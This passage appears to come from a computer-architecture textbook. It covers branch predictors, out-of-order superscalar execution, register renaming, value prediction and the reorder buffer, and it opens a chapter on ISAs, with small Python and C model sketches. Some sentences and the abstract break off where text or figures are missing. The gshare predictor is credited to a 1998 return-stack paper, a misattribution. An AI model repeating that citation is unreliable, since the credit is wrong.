• In case of branch mis-prediction, the instructions from the wrong branch path are
flushed from the pipeline and the PC is loaded with the correct address.
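A simplified, direct-mapped version of such a BTB with a one-bit history can be sketched in Python as follows (the set-associative organization of Fig. 32 is collapsed to one way, and the table size and 4-byte PC granularity are assumptions):

class BranchTargetBuffer:
    """Direct-mapped BTB sketch: tag, valid entry, target, one history bit."""

    def __init__(self, num_entries=256):
        self.entries = [None] * num_entries   # each entry: (tag, target, history)
        self.num_entries = num_entries

    def _index_tag(self, pc):
        word = pc >> 2                        # assume 4-byte instructions
        return word % self.num_entries, word // self.num_entries

    def lookup(self, pc):
        """Fetch-stage lookup: (predicted_taken, target) on a hit, else None."""
        index, tag = self._index_tag(pc)
        entry = self.entries[index]
        if entry and entry[0] == tag:         # BTB hit
            _, target, history = entry
            return history == 1, target       # the history bit gives the direction
        return None                           # BTB miss: fetch sequentially

    def update(self, pc, taken, target):
        """Resolution-stage update of both the history and target fields."""
        index, tag = self._index_tag(pc)
        self.entries[index] = (tag, target, 1 if taken else 0)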
instruction is always mis-predicted, i.e., MR=100%, while in the second case the predictor achieves an MR of nearly 50%. The last branch instruction is predicted correctly in all iterations except the first and the last. More advanced branch predictors, termed two-level branch predictors (Yeh and Patt 1991), perform their prediction in two stages. These predictors can be classified into two groups: local predictors and global predictors. Local two-level predictors perform their prediction based on the local (private) past history of every branch instruction, while global two-level predictors use the global history of recently executed branches for the prediction process.
The baseline scheme of the two-level local predictor, depicted by Fig. 35, expands the one-bit history field shown in Fig. 32 to multiple history bits. An n-bit history field, termed the BHR (Branch History Register), represents the local history of the corresponding branch; for example, for n=3, a history of 101 represents a branch that was taken, not taken, and then taken. The n-bit BHR field is used as an index into the second level of the BTB, which consists of sets of saturating counters. The prediction is determined by the state of the counter that corresponds to the BHR value. In the baseline scheme, every branch history is associated with a private set of saturating counters, but since this may introduce a considerable die area cost, various compromises have been suggested. For example, in the Pentium III two-level BTB, all branches within the same BTB set share the same set of counters, while the Alpha 21264 (1999) shares one set of counters among all BTB entries. Other schemes attempt to minimize the interference between conflicting branches that share the same set of counters. For example, the least-significant bits of the program counter can be concatenated with the BHR as an index into the shared counters; another approach performs a bitwise XOR between the BHR and n bits taken from the PC. Both schemes reduce the likelihood of collisions by using some bits from the PC to map branches with the same history to different counters.
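For reference, the classic two-bit saturating counter used in these second-level tables can be sketched as follows (the threshold of 2 for predicting taken is the usual convention):

def predict(counter):
    """Two-bit saturating counter: states 0..3, predict taken when >= 2."""
    return counter >= 2

def train(counter, taken):
    """Move one step toward the actual outcome, saturating at 0 and 3."""
    return min(counter + 1, 3) if taken else max(counter - 1, 0)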
A global two-level branch predictor replaces the local BHR fields with one global history register (GHR) (Mittal 2019; McFarling 1993). An n-bit GHR represents the history of the n most recently executed branches in the program. In the baseline scheme of the two-level global BTB, presented by Fig. 36, the n-bit GHR is used as an index into a set of 2^n saturating counters, which determine the prediction for every different combination of global history. One of the potential problems with the global predictor is the case of uncorrelated branches which exhibit different behavior for the same history; this may prevent the two-bit counters from correctly predicting the branch outcome. One solution to this problem, termed gshare (Skadron et al. 1998), performs a bitwise XOR of the GHR with bits from the PC. This helps spread different branch instructions with the same history across different saturating counters.
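A minimal gshare sketch in Python, combining the GHR with PC bits to index a table of two-bit saturating counters (the table size and hashing details are illustrative):

class GShare:
    """gshare sketch: XOR of global history and PC bits indexes the counters."""

    def __init__(self, history_bits=12):
        self.mask = (1 << history_bits) - 1
        self.ghr = 0                                # global history register
        self.counters = [1] * (1 << history_bits)   # initialized weakly not taken

    def _index(self, pc):
        return ((pc >> 2) ^ self.ghr) & self.mask

    def predict(self, pc):
        return self.counters[self._index(pc)] >= 2

    def update(self, pc, taken):
        i = self._index(pc)
        if taken:
            self.counters[i] = min(self.counters[i] + 1, 3)
        else:
            self.counters[i] = max(self.counters[i] - 1, 0)
        # Shift the actual outcome into the global history register.
        self.ghr = ((self.ghr << 1) | int(taken)) & self.mask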
Various processors, such as the Alpha 21264 (1999), employ hybrid predictors (also termed tournament predictors) which combine both local and global two-level BTBs. A general structure of a hybrid predictor is illustrated by Fig. 37. The hybrid predictor is governed by a chooser mechanism, which learns, per prediction, which BTB is preferred. For example, in the Alpha 21264, the chooser is implemented as an array of two-bit entries indexed by the GHR. Each bit of a two-bit entry represents a different predictor, local or global; a value of 1 indicates that in the last prediction the corresponding predictor was correct, and otherwise it was wrong. The chooser in this case uses the local predictor only if, in the last prediction corresponding to the GHR value, the local predictor was correct and the global predictor was wrong; in all other cases, the global predictor is preferred. There may be different implementations of the chooser: for example, the chooser array can be indexed by the PC instead of the GHR; in addition, the chooser array may implement various FSMs to learn the preferred predictor per branch.
In deep processor pipeline designs, updating the BTB can become a highly complicated process due to the long latency between the fetch stage, where the BTB lookup is performed, and the branch resolution stage, where the BTB update occurs. As a result, new branch instructions may enter the processor pipeline while prior branches are not yet resolved. If the history and the counters are not updated until the branch is resolved, the new branches may see outdated history and counter state, resulting in a high mis-prediction rate. Therefore, the BTB is speculatively updated with the prediction; however, in case of mis-prediction, it is necessary to roll back to the BTB state prior to the speculative updates. A special hardware mechanism is needed in the BTB both for maintaining the speculative updates and for recovering the BTB state in case of mis-prediction. Additional advanced branch prediction mechanisms can be found in modern processors, such as the return stack buffer (RSB) (Skadron et al. 1998), used to predict the target address of a return from subroutine; the loop predictor, used for loop branch prediction; and the iBTB (Gochman et al. 2003), used for indirect branch prediction.
Structural Hazards
Structural pipeline hazards occur due to either a lack of hardware resources or a collision on a resource needed by multiple pipeline stages. There can be several scenarios of structural conflicts. For example, assuming a unified cache memory for both instructions and data, the fetch stage and the memory stage may access the cache in the same clock cycle. If the cache has a single access port, this is a structural hazard that can be resolved either by using an arbiter for the cache access or by duplicating the cache port. Another solution, which was adopted by the presented processor, is split instruction and data caches, also known as the Harvard architecture. An additional example of a structural hazard occurs if it is decided to retime the write-back to the register file and perform the writes of non-load instructions at the memory stage instead of the WB stage, while load write-backs are kept at the WB stage. The structural hazard in this example happens when an ALU instruction at the memory stage attempts to write to the register file while a load instruction simultaneously tries to write at the WB stage. Since the register file has only one write port, this structural hazard has to be resolved by duplicating the write port of the register file or by adding an arbiter to arbitrate between the writes from these two stages.
Multiple-Issue Processor
So far, the discussion has focused on a single-pipeline processor where instructions are executed in order. Various techniques have been presented to improve pipeline utilization and overcome pipeline data hazards and control dependencies. What is the next evolutionary step for processors? Can performance be further improved? Recall that the execution time, provided by Equation 3, is the product of the instruction count (IC), the average clocks per instruction (CPI), and the clock cycle time (T=1/f):

Execution Time = IC × CPI × T    (3)

Reducing the clock cycle time T through deeper pipelining has its limits: as discussed earlier, deeper pipelines increase the branch penalty. In addition, there is also a practical limit to the granularity of breaking the processor data path and control unit into many pipeline stages. This would not only complicate the pipeline control unit, increase the number of sampling stages, and challenge the complexity of the forwarding network, but is also limited by physical design considerations.
Another option to improve execution time is to reduce the IC. This approach, which was adopted by CISC (Complex Instruction Set Computer) processors, uses complex instructions which can perform multiple complex operations. This approach may eventually increase the clock cycle time and the CPI due to the complexity of the new instructions and the required logic circuits.
Decreasing the CPI, or equivalently increasing the IPC (instructions per clock cycle), is also a valid approach to improving processor performance. In fact, all the techniques presented in the previous section help to decrease the processor CPI and improve pipeline utilization by minimizing pipeline stall cycles. The CPI depends not only on the processor microarchitecture but also on the program being run; for example, a program with a high number of data dependencies may have lower pipeline utilization and a higher CPI relative to a program with a low data dependency rate. Can the CPI be further improved? Can one achieve CPI<1 (or IPC>1)? In order to do so, the processor needs to handle multiple instructions in parallel through multiple pipelines; processors of this type are termed multiple-issue processors.
A superscalar processor, illustrated by Fig. 38, is a typical multiple-issue processor which employs multiple pipelines running in parallel. In this example, multiple instructions are fetched in parallel, decoded, executed, access the memory (if needed), and retire, all in a parallel manner.
The key to superscalar processor efficiency is the amount of parallelism exhibited by the program being run. The measure of such parallelism, termed ILP (instruction-level parallelism), is defined as the average number of instructions which can be executed in parallel while preserving program correctness. ILP is often illustrated using a dataflow graph, where every node represents an instruction
pipeline efficiency will be significantly improved and would be limited by the ILP
of the program.
Out-of-order execution is the process of executing instructions based on the dataflow graph while preserving program correctness. There are two main approaches to out-of-order execution: static and dynamic. Static out-of-order execution relies on the compiler to reorder instructions in accordance with the dataflow graph. Very long instruction word (VLIW) processors rely on such an approach, as illustrated by Fig. 42.
In VLIW processors, a very long instruction word container is used to encapsulate multiple instructions which can be executed in parallel. Since the encapsulation is performed by the compiler, it may yield limited performance gains due to the lack of information at compile time about dynamic events which may cause pipeline stalls, such as cache misses, branch mis-predictions, etc. Another limitation is that compilers cannot pack control-dependent instructions, since the resolution of the branch is not known at compile time. VLIW processors, though, introduce several advantages: they simplify the hardware implementation, and as a result they can run at a higher frequency or alternatively save power. For example, in such a processor, the need for a forwarding network can be eliminated.
• Fetch (F) – Multiple consecutive instructions are fetched in parallel. BTB lookup
is performed for control flow speculation.
The fetch, decode, and dispatch stages process instructions in order; the execution stage executes instructions out of order, while the commit stage performs instruction retirement in an in-order manner. At the dispatch stage, instruction dependencies are typically evaluated, and instructions that are ready to execute are sent to the corresponding execution unit. True-data-dependent instructions cannot be executed and are pushed into the reservation stations. The reservation stations act as buffers in which instructions wait till they become ready to execute. Every entry in a reservation station is connected to the forwarding network and snoops the results being forwarded; when all the source operands are ready, the instruction can be fired for execution. In the general scheme presented by Fig. 43, the reservation stations (R.S.) are implemented as distributed buffers attached to every execution unit, while various processor implementations may use a unified reservation station which serves all execution units. At the execution stage, the calculated results are broadcast to the forwarding network as soon as they are ready, and as a result may fire pending instructions for execution in the next clock cycle.
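The wake-up behavior of a reservation station can be sketched as follows in Python (the entry layout and the explicit snoop call are illustrative assumptions):

class ReservationStation:
    """Sketch: buffer instructions until all their source operands are ready."""

    def __init__(self):
        self.waiting = []   # entries: {"op": ..., "srcs": {reg_id: value or None}}

    def dispatch(self, entry):
        self.waiting.append(entry)

    def snoop(self, dreg, value):
        # A result broadcast on the forwarding network fills every
        # matching operand that is still waiting for it.
        for entry in self.waiting:
            if dreg in entry["srcs"] and entry["srcs"][dreg] is None:
                entry["srcs"][dreg] = value

    def fire(self):
        # Instructions whose operands are all ready can be sent to execute.
        ready = [e for e in self.waiting
                 if all(v is not None for v in e["srcs"].values())]
        self.waiting = [e for e in self.waiting if e not in ready]
        return ready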
Out-of-order superscalar processors introduce major microarchitectural complexity and design challenges. The duplicated pipelines, the complex pipeline control unit, and the dense forwarding network significantly complicate the processor design, verification, and physical design implementation process. In addition, they introduce additional types of pipeline data hazards, known as write-after-write (WAW) hazards and write-after-read (WAR) hazards. WAW and WAR hazards, illustrated by Fig. 44, may lead to incorrect program execution. A WAW hazard, also termed a false dependency, occurs when two instructions that have the same destination register are reordered by the out-of-order processor. A WAR hazard, also referred to as an anti-dependency, happens when two instructions are reordered by the processor and the later instruction in program order writes to a register that is used by an earlier instruction; as a result, the earlier instruction may read the wrong value.
Can these anti-dependencies and false dependencies be solved? Renaming the destination registers in the examples above eliminates these dependencies, as illustrated by Fig. 45 (elimination of WAW and WAR hazards with renaming), while still preserving the correctness of the program.
An out-of-order superscalar processor employs a register-renaming mechanism to eliminate both WAW and WAR hazards. The principle of register renaming is based on decoupling the architectural registers (which are part of the Instruction Set Architecture) used by the program code from the physical registers which can host them. As part of the register renaming scheme, the processor maintains a bank of physical registers which can be larger than the number of architectural registers. In addition, a mapping table, termed the register alias table (RAT), is used to map the architectural register identifiers to the physical register locations. The register renaming process, performed at the decode stage, involves replacing the architectural source registers with the physical registers based on the mapping specified by the RAT. In addition, every architectural destination register is mapped to a new physical register, and the RAT is updated. This mechanism assures that the processor core can eliminate both false and anti-dependencies as long as there are available physical registers. An example of the register renaming process is illustrated by Fig. 46.
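A sketch of the renaming step in Python (the free-list management and table sizes are illustrative assumptions):

class RegisterRenamer:
    """RAT sketch: map architectural registers to physical registers."""

    def __init__(self, num_arch=32, num_phys=64):
        self.rat = list(range(num_arch))             # initial identity mapping
        self.free_list = list(range(num_arch, num_phys))

    def rename(self, sregs, dreg):
        """Rename one instruction's source and destination registers."""
        phys_srcs = [self.rat[s] for s in sregs]     # read the current mappings
        if not self.free_list:
            raise RuntimeError("stall: no free physical registers")
        phys_dst = self.free_list.pop(0)             # fresh physical destination
        self.rat[dreg] = phys_dst                    # update the RAT
        return phys_srcs, phys_dst

# Renaming two successive writes to the same architectural register assigns
# them different physical registers, which removes the WAW hazard between them.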
While register renaming can solve false and anti-dependencies, it cannot eliminate true-data dependencies (RAW hazards). True-data dependencies reflect the serial parts of the program code, and therefore the dataflow graph is considered the upper bound on ILP. Various past studies suggested predicting the values being calculated by instructions and speculatively forwarding them to true-data-dependent instructions (Lipasti and Shen 1996; Gabbay and Mendelson 1997, 1998). This technique, known as value prediction, attempts to collapse true-data dependencies and exceed the dataflow limitations on ILP. If the prediction is found to be correct, instruction execution continues with no disruption. In case of value mis-prediction, the entire dependency chain that was fed by the incorrect prediction is flushed out of the pipeline and re-executed using the correct value. Various value predictors were introduced, such as the last-value predictor (Lipasti and Shen
1996) and the stride value predictor (Gabbay and Mendelson 1998), and several others (Wang and Franklin 1999). The last-value predictor predicts the outcome value of an instruction based on the value the instruction computed most recently. The stride value predictor generalizes the last-value predictor and attempts to predict the destination value as the last seen value plus a stride learned by the predictor; the stride is calculated as the difference between the two most recently seen values.
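The following is a minimal C sketch of a single stride-predictor entry; the structure and update policy are illustrative assumptions, not a description of any specific predictor:

#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint64_t last_value;  /* most recently committed result */
    int64_t  stride;      /* difference between the two last results */
} StrideEntry;

/* Predicted next value: last value plus the learned stride. */
uint64_t predict(const StrideEntry *e) { return e->last_value + e->stride; }

/* Update on commit: relearn the stride from the two most recent values. */
void update(StrideEntry *e, uint64_t actual) {
    e->stride = (int64_t)(actual - e->last_value);
    e->last_value = actual;
}

int main(void) {
    StrideEntry e = {0, 0};
    /* A load walking an array of 8-byte elements produces values
       0, 8, 16, ...; after two updates the predictor locks onto stride 8. */
    for (uint64_t a = 0; a < 48; a += 8) {
        printf("predict=%llu actual=%llu\n",
               (unsigned long long)predict(&e), (unsigned long long)a);
        update(&e, a);
    }
    return 0;
}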
Control dependencies also introduce major performance challenges to superscalar out-of-order processors. Since the efficiency of such processors highly depends on their ability to maintain the needed supply of instructions for parallel execution, a high-bandwidth, undisrupted instruction flow is crucial. Branch prediction plays a key role here, not only in reducing the branch penalty but also in helping the processor fetch instructions across branch boundaries (using the BTB prediction), thereby potentially increasing the effective supply of candidate instructions for parallel execution. Moreover, a highly accurate branch predictor is an essential requirement for such processors.
Let's consider a processor with a depth of 100 instructions (instruction window), and let's assume that 20% of the instructions in the program are branches and that the branch predictor accuracy is 95%. On average, there will be 0.20 × 100 = 20 branch instructions in the pipeline. The likelihood that all of them were predicted correctly is 0.95^20, which is approximately 36%. A 1% accuracy improvement, from 95% to 96%, increases this probability from 36% to 44%. This demonstrates the importance of branch prediction accuracy in providing an undisrupted flow of instructions to the out-of-order superscalar processor.
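These numbers are easy to reproduce; the short C program below evaluates p^n for the assumed window of 100 instructions with 20% branches:

#include <math.h>
#include <stdio.h>

int main(void) {
    int branches = (int)(0.20 * 100);  /* 20 in-flight branch instructions */
    /* Probability that every in-flight branch is predicted correctly. */
    printf("p=0.95 -> %.0f%%\n", 100.0 * pow(0.95, branches));  /* ~36% */
    printf("p=0.96 -> %.0f%%\n", 100.0 * pow(0.96, branches));  /* ~44% */
    return 0;
}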
The Reorder Buffer (RoB) is the mechanism that concludes this overview of the out-of-order superscalar processor. The RoB, which is usually implemented as a cyclic buffer, maintains a record for every instruction being processed. The RoB records are ordered in accordance with the original order of instructions within the program. The RoB is the key mechanism responsible for instructions retiring and committing their architectural changes (writes to memory or the register file) in order. The commit rule used by the RoB is that an instruction can commit only if it
has completed execution and all prior instructions have completed successfully. The in-order commit process performed by the RoB is essential to assure the correct order of interrupts (precise interrupts) and to allow speculatively executed instructions (due to branch prediction or value prediction) to wait in the RoB until they can be committed. The RoB also facilitates the flush process in case of branch mis-prediction: since instructions are ordered in the RoB in accordance with program order, detecting the location of flushed instructions is simple, and the RoB maintains the needed details on the processing stage of every pending instruction. Lastly, the RoB guarantees that all architectural state changes are reflected to the external world as if the program were executed sequentially.
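A toy model of the in-order commit rule fits in a few lines of C; the entry fields and buffer size below are illustrative assumptions, not a description of any commercial RoB:

#include <stdbool.h>
#include <stdio.h>

#define ROB_SIZE 8

typedef struct { bool valid, done; int dest; } RobEntry;

static RobEntry rob[ROB_SIZE];
static int head = 0, tail = 0;   /* head: oldest entry; tail: next free slot */

int rob_alloc(int dest) {        /* at dispatch, in program order */
    int idx = tail;
    rob[idx] = (RobEntry){true, false, dest};
    tail = (tail + 1) % ROB_SIZE;
    return idx;
}

void rob_complete(int idx) { rob[idx].done = true; }  /* out of order */

/* Commit from the head only: guarantees in-order architectural updates. */
void rob_commit(void) {
    while (rob[head].valid && rob[head].done) {
        printf("commit r%d\n", rob[head].dest);
        rob[head].valid = false;
        head = (head + 1) % ROB_SIZE;
    }
}

int main(void) {
    int a = rob_alloc(1), b = rob_alloc(2);
    rob_complete(b);   /* the younger instruction finishes first... */
    rob_commit();      /* ...but nothing commits until 'a' is done */
    rob_complete(a);
    rob_commit();      /* now both commit, in program order */
    return 0;
}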
Conclusions
As advanced process nodes approach the atomic scale and processor die sizes continuously grow, the introduction of new 2.5D and 3D integration technologies offers significant opportunities for further scaling and system integration. Advanced technologies, such as Chip-on-Wafer-on-Substrate (CoWoS), offer advanced multi-die integration with high-bandwidth memory (HBM) on a silicon interposer. Today, 3D integration technologies are already employed in different applications, such as routers, FPGAs, and GPUs; however, they have not yet made significant inroads into traditional general-purpose microprocessor designs. Will microprocessors be able to leverage such technologies and offer ultra-large-scale integration of thousands of cores and peripherals? Such a path may offer tremendous opportunities for performance scaling and memory bandwidth enhancement; however, it binds the system to a predefined architectural topology which cannot be controlled by users.
Another force changing the paradigm of traditional computer systems is the ongoing shift from control flow-based computing to dataflow-based computing. This important trend, driven today by applications such as machine learning, high-performance computing, and cryptography, exposes microprocessors' built-in conflicts. While microprocessors need to provide reasonable performance for a broad range of applications with diverse requirements, they lack the ability to excel in specific domains with different processing requirements. This gap has boosted the development of accelerators tailored for specific applications, such as GPUs, TPUs, FPGAs, and ASIC devices. So far, microprocessors have not been able to offer competitive performance with respect to accelerators. SoCs have integrated various co-processor engines which can be programmed by the CPU to execute specific workloads; such a solution may introduce only a limited performance improvement, in particular when a massive scale of processing is involved. It will be highly interesting to see how microprocessors and accelerators evolve over the next decades. Will they continue to coexist, or will there be a fusion between the two domains? Emerging technologies such as embedded FPGAs offer various opportunities for microprocessors to integrate programmable logic into the processor silicon die. When such technologies become more mature and offer higher scale and performance, they may give CPUs a competitive edge in the era of accelerated computing.
Finally, powerful emerging memory technologies also have a major impact on the future microprocessor roadmap. Stacks of high-bandwidth memory (HBM) offer low-latency, high-bandwidth integration with processors. Additional approaches, such as near- or in-memory computing, introduce major memory bandwidth and computational advantages; however, such technologies need to mature before they can be physically integrated into commercial processors. Memristor technologies have also made major progress in the past decades, offering high density, low power, and resiliency for memory and storage devices. Memristors have not yet matured to the point of commercial product deployment; however, they may significantly change microprocessors' future memory systems.
In summary, future microprocessors incorporate exciting opportunities that combine emerging technologies which will, no doubt, change the traditional paradigm of computing. These changes are driven not only by new technologies but also by the incredible number of new applications of computer systems, which affect every field of day-to-day life.
References
Alpha 21264 Microprocessor Data Sheet (1999) Revision 1.0, Feb 1999. Compaq Computer
Corporation
Gabbay F, Mendelson A (1997) Speculative execution based on value prediction. Technical report,
Technion
Gabbay F, Mendelson A (1998) Using value prediction to increase the power of speculative
execution hardware. ACM Trans Comput Syst 16(3):234–270
Hennessy JL, Patterson DA (2011) Computer architecture. A quantitative approach, 5th edn.
Morgan Kaufmann Publishers Inc., San Francisco
Kane G (1988) MIPS RISC architecture. Prentice Hall, Inc.
Lee JKF, Smith AJ (1984) Branch prediction strategies and branch target buffer design. IEEE
Comput Mag 17(1):6–22
Lipasti MH, Shen JP (1996) Exceeding the dataflow limit via value prediction. In: Proceeding of
the 29th annual ACM/IEEE international symposium on microarchitecture, pp 226–237
McFarling S (1993) Combining branch predictors. Digital Western Research Laboratory, Technical
Report
Mittal S (2019) A survey of techniques for dynamic branch prediction. Concurr Comput Pract Exp 31(1):e4666
Patterson D, Waterman A (2017) The RISC-V reader: an open architecture atlas. ISBN-13: 978-
0999249116. Strawberry Canyon Publishers
Gochman S, Ronen R et al (2003) The Intel Pentium M processor: microarchitecture and performance. Intel Technol J
Skadron K, Ahuja PS, Martonosi M, Clark DW (1998) Improving prediction for procedure
returns with return-address-stack repair mechanisms. In: Proceedings. 31st annual ACM/IEEE
international symposium on microarchitecture, Dallas, pp 259–271. https://doi.org/10.1109/
MICRO.1998.742787
Sloss AN, Symes D, Wright C (2004) Chapter 2 – Arm processor fundamentals. In: The Morgan
Kaufmann series in computer architecture and design, ARM system developer’s guide. Morgan
Kaufmann, pp 18–44. ISSN 15459888, ISBN 9781558608740. https://doi.org/10.1016/B978-
155860874-0/50003-4
von Neumann J (1945) First Draft of a Report on the EDVAC, archived from the original (PDF) on
14 Mar 2013, retrieved 24 Aug 2011
Wang K, Franklin M (1999) Highly accurate data value prediction using hybrid predictors. In:
Proceeding of the 30th annual ACM/IEEE international symposium on microarchitecture,
pp 281–290
Yeh T-Y, Patt Y (1991) Two-level adaptive training branch prediction. In: Proceedings of the 24th
annual international symposium on microarchitecture, pp 51–61
2 The Architecture
Avi Mendelson
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Terms and Notations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Laws and Models in Microprocessor/System-on-Chip (SoC) Architectures . . . . . . . . . . . . . . . 50
ISA Selection and Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
CISC: Complex Instruction Set Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
RISC: Reduced Instruction Set Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
The RISC-V Approach for ISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
Summary of ISA Selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Vector and SIMD Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Cross-Layers Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Delayed Branch in MIPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
The User-Defined Microcode Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
VLIW Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
HW/SW Codesign: The CUDA Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
ISA Agnostic Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
The Use of Intermediate Representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Binary Translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
A. Mendelson
CS Department, Technion, Haifa, Israel
e-mail: [email protected]
Abstract
on optimizations that break the barriers between the traditional software and
hardware interfaces. Finally, it discusses the main differences between general-
purpose processors and dedicated (domain-specific) architectures.
Keywords
Introduction
(Figure: the Von Neumann machine, with memory, I/O, and the five pipeline stages: Fetch, Decode, Execute, Memory, Write-back)
modes of operations. A dedicated bit in the status register indicates the current execution state; that is, it helps distinguish between these modes. Thus, the same hardware behaves differently when the system is in execution mode and when it is in I/O (supervision) mode.
The Von Neumann model does not consider cache hierarchies, since they are transparent to the software model and mainly aim to improve the processor's performance; thus, caches are usually considered part of the microarchitecture (and will be discussed in the next chapter). Registers, on the other hand, although considered part of the memory hierarchy, do have a significant impact on software; they are therefore considered part of the interface between the software and the hardware and are assumed to be part of the ISA.
Figure 2 also depicts the different execution stages of the Von Neumann machine. It shows a simple in-order five-stage pipeline architecture where (1) instructions are fetched from memory with respect to a special register called the program counter (some architectures call it the instruction counter); (2) the interpretation of the instruction, that is, what the system needs to perform, is determined at the decode stage; (3) the execution stage is dedicated to performing calculations, including address calculations; (4) during the memory stage, the system uses the address calculated in the third stage to read data from or write data to memory; and (5) finally, at the write-back (commit) stage, data gets exposed to the external world, for example, written back to registers.
There are many different types of ISAs, such as CISC (complex instruction set), RISC (reduced instruction set), vector operations, and mixed/hybrid modes. This chapter attempts to explain why multiple ISAs were created and what the cost of using a "wrong" ISA is. We start with a discussion of some of the "traditional" classes of ISA and extend the discussion to methods, such as cross-layer optimizations, that break the barriers between the traditional software and hardware interfaces.
Terms and Notations
• ISA – Instruction Set Architecture – represents the compiler's and other software packages' view of the hardware.
• ILP – instruction-level parallelism: how many instructions the system can execute every cycle.
• CPI – Cycles Per Instruction = 1/IPC = (total number of cycles required to execute the program) / (total number of instructions executed in the program)
• Performance: It is usually measured as the time it takes to compute a specific task. One can estimate it as Execution time = IC × CPI × Clock cycle time.
• Amdahl's law (Amdahl 1967, 2013; Gustafson 1988):
t_new = t_old × ((1 − F) + F/S)    (1)
where F is the fraction of execution time affected by the optimization and S is its speedup; the new execution time is the fraction that was not affected plus the optimized portion. This law is used in computer architecture to indicate that it is recommended to optimize the code sections that are used most often (a short numeric check appears after this list).
• Memory footprint: The amount of memory needed to hold a program's complete code and data.
• Power: The amount of electricity a device is consuming at any point in time.
• Energy: The amount of electricity a device consumes during a period of time or
when executing a task.
• Hardware complexity: In this chapter, we assume that hardware complexity is
proportional to the size of the silicon that it takes to implement it.
• Backward compatibility: SW that was compiled to run on an older version of the hardware will also run on a new generation of the hardware. Please note that some systems require that the new generation of hardware run old code with at least the same (or better) performance as on the previous generation of that hardware.
• Load/Store architecture: An architecture in which all arithmetic operations are performed between registers; data is always fetched into a register via Load instructions and written back to memory using Store instructions (Fig. 3).
• Moore's Law, coined by Gordon Moore, predicted that the number of transistors in an integrated circuit doubles every 2 years. This became a guiding principle for generations of semiconductor technology and boosted the performance of computer architectures. However, there has been a noticeable slowdown in leveraging Moore's law since the 2010s, due to numerous effects across the complete architecture design stack (e.g., leakage power, reliability, manufacturing defects, the memory wall, limits of parallelism). As a result, architecture designers are moving to alternative avenues to boost efficiency, such as coarse/fine-grained parallelism (multicore platforms, reconfigurable architectures), in-memory computing, photonic computing, and superconducting technologies.
• Dennard's Power Scaling (Dennard et al. 1974) stated that with increasing transistor density in an integrated circuit, there is a proportional decrease in capacitance and voltage, resulting in constant power density. This indicated that performance per watt increases (doubling every 2 years), since with more transistors, higher performance can be extracted at the architecture level. This scaling phenomenon coexisted with Moore's Law from the mid-1970s until it was shown to be broken by the effects of leakage current and the resulting thermal runaway.
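As a quick numeric check of Eq. (1), the sketch below computes the overall speedup 1/((1 − F) + F/S) for a fraction F accelerated by a factor S; the chosen values of F and S are arbitrary examples:

#include <stdio.h>

/* Overall speedup per Amdahl's law: F is the accelerated fraction of the
   original execution time, S the speedup of that fraction. */
double amdahl_speedup(double F, double S) {
    return 1.0 / ((1.0 - F) + F / S);
}

int main(void) {
    /* Even an enormous speedup of 80% of the work caps the overall gain at 5x. */
    printf("F=0.8, S=10  -> %.2fx\n", amdahl_speedup(0.8, 10.0));  /* 3.57x */
    printf("F=0.8, S=1e9 -> %.2fx\n", amdahl_speedup(0.8, 1e9));   /* ~5.00x */
    return 0;
}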
Application-Specific Focus
• Makimoto's wave (Engineering 1991) showed that the design community periodically swings between customization and standardization of system components. With the advent of each new architectural innovation, there is a significant push towards customization (in turn increasing application performance), which after a while settles back into standardized, less flexible designs catering to a wider segment of applications. The move from customization to standardization is also correlated with the growth of trained engineering manpower and robust, sophisticated design-automation flows.
(Figure: the design space plotted on log-scale axes of performance, power dissipation, and flexibility, spanning General-Purpose Processors, Digital Signal Processors, Application-Specific Instruction Set Processors, Field-Programmable Devices, Application-Specific ICs, and Physically Optimized ICs)
ISA Selection and Considerations
Different processors aim at various markets; some target multiple markets and are termed "general purpose," while others target specific markets, such as IoT devices or sensors. The market dictates the optimization points and the design philosophy of each processor.
This section examines three types of ISA: CISC, traditional RISC, and modern RISC, for example, RISC-V. For each type, we describe its optimization points, provide a few examples of processors using it, and discuss the pros and cons of the approach.
CISC: Complex Instruction Set Computer
The Baseline: Looking at the ISA of the 8088 and the 8086 Processors
The 8088 processor was one of the first processors Intel launched, in 1979 (Singh 1988). It used an 8-bit data path and a 20-bit address width. The architecture was based on 16-bit registers (see Fig. 4), adopted the Von Neumann principles of operation, and implemented a simple in-order design. The system uses physical
memory only and divides it into four segments. Thus, four segment registers were used to point to the correct memory region. The Code, Data, and Stack segment registers were selected automatically according to the type of operation the system performed, while the ES segment register required explicit notation, since it was used for sharing data among different tasks.
